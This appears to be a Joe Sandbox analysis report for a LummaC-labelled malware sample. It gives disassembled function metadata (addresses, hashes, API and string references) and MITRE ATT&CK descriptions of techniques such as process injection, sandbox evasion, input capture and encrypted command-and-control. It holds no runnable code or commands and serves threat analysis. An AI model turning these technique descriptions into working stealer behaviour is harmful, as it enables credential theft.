Instruction ID: a9321d199f9bbb2e716e034ffe15a296e7cf8852c295a5f9b69c81cd74603ee6
Opcode Fuzzy Hash: cdcc0fb5cbd91ceb6765398bd4ae9cf88231e27c8ec20e65d9f73f81bcf8d298
Instruction Fuzzy Hash: 6C61A176B046054FDB0CCE69D8A06BDB6A3BBC9220B6CC13DD917DB389DB309812C754

Function 029985A0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9869e21269512c87226f0218ae91bb19ef26592dab5de4c416b6cbfb42a5a5fc
Instruction ID: 102b7de87c4d8875e5501b4883d5f19668d2e984df380a0af547d30238541861
Opcode Fuzzy Hash: 9869e21269512c87226f0218ae91bb19ef26592dab5de4c416b6cbfb42a5a5fc
Instruction Fuzzy Hash: C6613837F596D14BCB24883C4C512B9AA572FE7234B2E877ED9B59B3D1C6268C12C390

Function 0299EF10 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de43f87032d4e62421f21c3cdd257181cf96d345f97c96525ac34a46163c0935
Instruction ID: 2fdcd5c1c7d6d842c8c0a0d553de8fba53c4ad437e437cb706878ab7a442c489
Opcode Fuzzy Hash: de43f87032d4e62421f21c3cdd257181cf96d345f97c96525ac34a46163c0935
Instruction Fuzzy Hash: 54514AB16087548FE714DF29D49435BBBE5BBC8318F144A2EE4E987750E379D6088F82

Function 02965BC0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769a4747b88997b15acd9e35353ae620270efa84f2c3370df4983f6ac13fa657
Instruction ID: 63a164ddcaedda3986b51f315547e1aaa2b3d0e36e11aaa29b06542e5600fcdb
Opcode Fuzzy Hash: 769a4747b88997b15acd9e35353ae620270efa84f2c3370df4983f6ac13fa657
Instruction Fuzzy Hash: 5051F3B0A043019FC714DF18C49893AB7E6FF89324F564A6DE8959B391D731EC41CB92

Function 02971870 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5fca1b2c9986d08d84549053c9a6905f7801457795e11fac5fc6eaf1206079
Instruction ID: 5f4a17faa999b7ccf86b9557a9bf5ad2efada0d6280aa9857db1a55be8231292
Opcode Fuzzy Hash: 9b5fca1b2c9986d08d84549053c9a6905f7801457795e11fac5fc6eaf1206079
Instruction Fuzzy Hash: EC41F672B083650FD358CE3A889016ABBD2ABC5210F19C63DF4E9C73D5D674C906D751

Function 029A0580 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244975f660d19ef1c80ed225602693b96feccd8699626c2671bd857335dab75f
Instruction ID: 6b85629e53aca56899ad727a1c93aea287ae24524a9d53780128123bb1b412f9
Opcode Fuzzy Hash: 244975f660d19ef1c80ed225602693b96feccd8699626c2671bd857335dab75f
Instruction Fuzzy Hash: CA313B32A197344BD7155D3D48A036FBB926BC5778F1A8B2DEAB14B3D1DA71484183C1

Function 02984FD0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413d20d18377a2120c5e71d4ee27e2804c05c09da1b30cb940a0b4ad86aeb161
Instruction ID: 573ef18965ffd04eeca7b1cc9caa5b09a2cb7bfd01212dc186f7c04095d69671
Opcode Fuzzy Hash: 413d20d18377a2120c5e71d4ee27e2804c05c09da1b30cb940a0b4ad86aeb161
Instruction Fuzzy Hash: A831B3715002059BCB10AF14D892B7673F4FF45368F8E8569E88A8B291E735E958C7D2

Function 02964B70 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a289223212ffb30cbe73d40af1a21cdb7179ba7169488fe1948c26adee033a52
Instruction ID: c95baf2b922c06e1e2a81ec7d93da2d71e7920b03c1213557c7fafe389bca9a7
Opcode Fuzzy Hash: a289223212ffb30cbe73d40af1a21cdb7179ba7169488fe1948c26adee033a52
Instruction Fuzzy Hash: 0131EA346082029BD7249EB8D888B3EB7E5EFC4318F18997DE89997351D335D852CF42

Function 02967030 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935939411700ce2fd7722a19e2cae87b4e25c9583b40d9d329fb975b9c95e839
Instruction ID: 17f222bf2c683818303d3ef2f89ea781ffa1ed418197584afc3573329eca8983
Opcode Fuzzy Hash: 935939411700ce2fd7722a19e2cae87b4e25c9583b40d9d329fb975b9c95e839
Instruction Fuzzy Hash: 4B112973F542610BE718CDA198E457A7396EBC522970A043DCE43D7281CE70E410E2B0

Function 0299B3F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 9127c7daabea34a601fc350728e311426f712740cfa865f8d077867300197ba9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9A110233A091D44EC712CD3C94506B5BFE30AA353CB5D8399E4F89B2D2D6268D8A9361

Function 029904D0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a99e04415cdefda11458bc58355c624994254988361fd94656ac7bda975dc8
Instruction ID: bf3630ce13419371ab2248be97c8e328ae1c4b029cbfc3331eb56e12a359ff0b
Opcode Fuzzy Hash: 73a99e04415cdefda11458bc58355c624994254988361fd94656ac7bda975dc8
Instruction Fuzzy Hash: 090171F160034147DF20DE5994C4B3BB3ED6F85728F18442CD86967701EBB6E805CAA2

Function 02973756 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d022fc1e32f718599f9685a4a75f6feb9f5bf7a4cee163e6351e2d400dcbc1b
Instruction ID: 0542d0bec1c8c615d09372d787d939364a1288fcf753f361bb859e054fd1fab9
Opcode Fuzzy Hash: 9d022fc1e32f718599f9685a4a75f6feb9f5bf7a4cee163e6351e2d400dcbc1b
Instruction Fuzzy Hash: 68015EB060D340ABD3119B518944A6FBBE6AFCAB14F044E4CE49957281D734ED14DBAB

Function 029736C9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196e9539fda79a4e9299b96aa320f731c1df2d8641bd4f42ed7f5a5b71ee7bab
Instruction ID: d527cfafbddc217c7773e9fdafed5bd76bd79874ede385b5511f512953f36de4
Opcode Fuzzy Hash: 196e9539fda79a4e9299b96aa320f731c1df2d8641bd4f42ed7f5a5b71ee7bab
Instruction Fuzzy Hash: 63015B70A0D340ABD311AF528544A7EBBE6ABCAB14F045E4CE09967281C734E814DB9B

Function 0297B130 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f02cf833e13e7e77a07f104192301b5c7d2cf028f1d5345113c9a669c21073
Instruction ID: dc6cb9bdcc39ca895038f00e874f4e5dcae9f8d135fe44d15ab58c1cc13d3fc3
Opcode Fuzzy Hash: d1f02cf833e13e7e77a07f104192301b5c7d2cf028f1d5345113c9a669c21073
Instruction Fuzzy Hash: DDF02BB2A04210ABDB32C9949CD0F77FB9DCBCB36CF191465E88597202E2619845C3E6

Function 029A1DF0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
Instruction ID: 0c428050bfc4df77f700fc00597e83764ed5d187daca8f983c60903add1812c9
Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
Instruction Fuzzy Hash: C6E0C27AB5572106AB68CE2698116B7F3E5EAC6712F5CA52EE446D3208D338C44082A4

Function 02995BAC Relevance: 52.7, APIs: 1, Strings: 29, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02995C5C

Strings

1, xrefs: 02995CBA
l, xrefs: 02995E2A
B, xrefs: 02995CCA
m, xrefs: 02995E3A
i, xrefs: 02995E8A
=, xrefs: 02995BCA
<, xrefs: 02995C9A
s, xrefs: 02995E4A
=, xrefs: 02995BBA
R, xrefs: 02995D1A
5, xrefs: 02995CAA
B, xrefs: 02995D7A
S, xrefs: 02995D2A
F, xrefs: 02995DCA
k, xrefs: 02995E1A
s, xrefs: 02995DAA
S, xrefs: 02995E5A
e, xrefs: 02995DBA
;, xrefs: 02995D8A
+, xrefs: 02995D3A
0, xrefs: 02995F60
H, xrefs: 02995DEA
X, xrefs: 02995E7A
J, xrefs: 02995E0A
Q, xrefs: 02995D5A
A, xrefs: 02995D6A
_, xrefs: 02995E6A
$, xrefs: 02995BDA
8, xrefs: 02995D0A

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: $$+$0$1$5$8$;$<$=$=$A$B$B$F$H$J$Q$R$S$S$X$_$e$i$k$l$m$s$s
API String ID: 2525500382-293042166
Opcode ID: bdacc7e7136e9c6c01269a7b694ba4acf2a6ea86a45fcb6ad5a4c0c19ab4cc22
Instruction ID: f4a7fa9eaa033e6265d97e8aaf735f89b6bcad5f355beb66e1b0422a40c5b6ec
Opcode Fuzzy Hash: bdacc7e7136e9c6c01269a7b694ba4acf2a6ea86a45fcb6ad5a4c0c19ab4cc22
Instruction Fuzzy Hash: 1AA1A17010C7C28AD336DA2C94487DFBEE16BA7324F084A9DE5E94A2E2D3B54145CB67

Function 02997AE1 Relevance: 29.9, APIs: 1, Strings: 16, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02997B59

Strings

t, xrefs: 02997BB0
u, xrefs: 02997BC8
:, xrefs: 02997C08
?, xrefs: 02997C18
~, xrefs: 02997B90
0, xrefs: 02997C38
?, xrefs: 02997C10
;, xrefs: 02997C48
y, xrefs: 02997BC0
$, xrefs: 02997BA0
0, xrefs: 02997CE1
P, xrefs: 02997BA8
Z, xrefs: 02997BD0
=, xrefs: 02997C30
4, xrefs: 02997BE8
}, xrefs: 02997BD8

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: $$0$0$4$:$;$=$?$?$P$Z$t$u$y$}$~
API String ID: 2525500382-3551422112
Opcode ID: e04b37832ac324fc39e95cb067c4f62531e702989269d86a116eb7655fe79ecb
Instruction ID: 2eaf429121d65d473ab9ad17dd9b0dba30fd9c233570c1a3de3ed624a3663a3e
Opcode Fuzzy Hash: e04b37832ac324fc39e95cb067c4f62531e702989269d86a116eb7655fe79ecb
Instruction Fuzzy Hash: 1C81B260408BC28EDB22CF3C8488715BF916B26224F488BCDD8E94F7EBC365D555C766

Function 02996222 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0299622C
VariantInit.OLEAUT32 ref: 0299623F

Strings

9, xrefs: 02996262
%, xrefs: 029962C2
/, xrefs: 029962F2
-, xrefs: 02996302
!, xrefs: 029962A2
), xrefs: 029962E2
#, xrefs: 02996292
?, xrefs: 02996272
=, xrefs: 02996282
', xrefs: 029962B2
+, xrefs: 029962D2

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$9$=$?
API String ID: 2610073882-2683649463
Opcode ID: 80b027a344f2c28f15dc114097d2427eebc5a2a5fbfb6537ff6fb2ac6041965b
Instruction ID: 6648c0b086415f14ca3e1a3422f5e4fc14dcacab791500206e961780fa51975c
Opcode Fuzzy Hash: 80b027a344f2c28f15dc114097d2427eebc5a2a5fbfb6537ff6fb2ac6041965b
Instruction Fuzzy Hash: C851B17050C7C18ED332DB38945979BBFE5ABA6324F080A9DE0E94B392C7758549CB63

Function 029957A4 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 029957AE
VariantInit.OLEAUT32 ref: 029957C1

Strings

2, xrefs: 0299582C
M, xrefs: 0299588C
K, xrefs: 0299587C
U, xrefs: 029957FC
Q, xrefs: 0299580C
[, xrefs: 0299583C
[, xrefs: 0299585C
J, xrefs: 0299586C
X, xrefs: 0299581C
n, xrefs: 0299584C
C, xrefs: 0299589C

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 2$C$J$K$M$Q$U$X$[$[$n
API String ID: 2610073882-1972926546
Opcode ID: d1dbd9c61a9821e7e582cb2eddaf3c48000e544b93e4aa031ca08a8ab2d3d2bc
Instruction ID: ef50ececf8a79ca7beca5c6d6679355bd9f35a1d9201c3a94a1cd21945f7898a
Opcode Fuzzy Hash: d1dbd9c61a9821e7e582cb2eddaf3c48000e544b93e4aa031ca08a8ab2d3d2bc
Instruction Fuzzy Hash: EE41A36010D7C1CEE3319B6C8858B9BBFE0AB92324F044B5DE4E9872D2C7759549CB63

Function 0299904F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 02999087
GetSystemMetrics.USER32 ref: 02999096

Strings

, xrefs: 02999141

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 6b74aa769e522ce5e5dbed9e65d5a2f0b7b20348712096cec4f1e180e87f07b5
Instruction ID: dc9f1f2997ac640cb1449b50aaeb5cb946518cf2afc880307f5b61fb187a7bf4
Opcode Fuzzy Hash: 6b74aa769e522ce5e5dbed9e65d5a2f0b7b20348712096cec4f1e180e87f07b5
Instruction Fuzzy Hash: B841CFB09183049FDB00EF6CD985A1ABBF4FF88304F11496EE888DB351D771A958CB82

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iq2HxA0SLw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
iq2HxA0SLw.exe

Function 0299FCBC Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 314
memoryCOMMON

Function 02970770 Relevance: 20.5, Strings: 16, Instructions: 496
COMMON

Function 029A0161 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 303
COMMON

Function 0296D1A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
threadCOMMON

Function 0296F860 Relevance: 6.6, Strings: 5, Instructions: 383
COMMON

Function 029A7130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Function 0299FAD0 Relevance: 1.6, APIs: 1, Instructions: 66
comCOMMON

Function 02972773 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 846
COMMON

Function 029A3E10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Function 029A6058 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 0299FC10 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Function 029A3EA8 Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 02972751 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON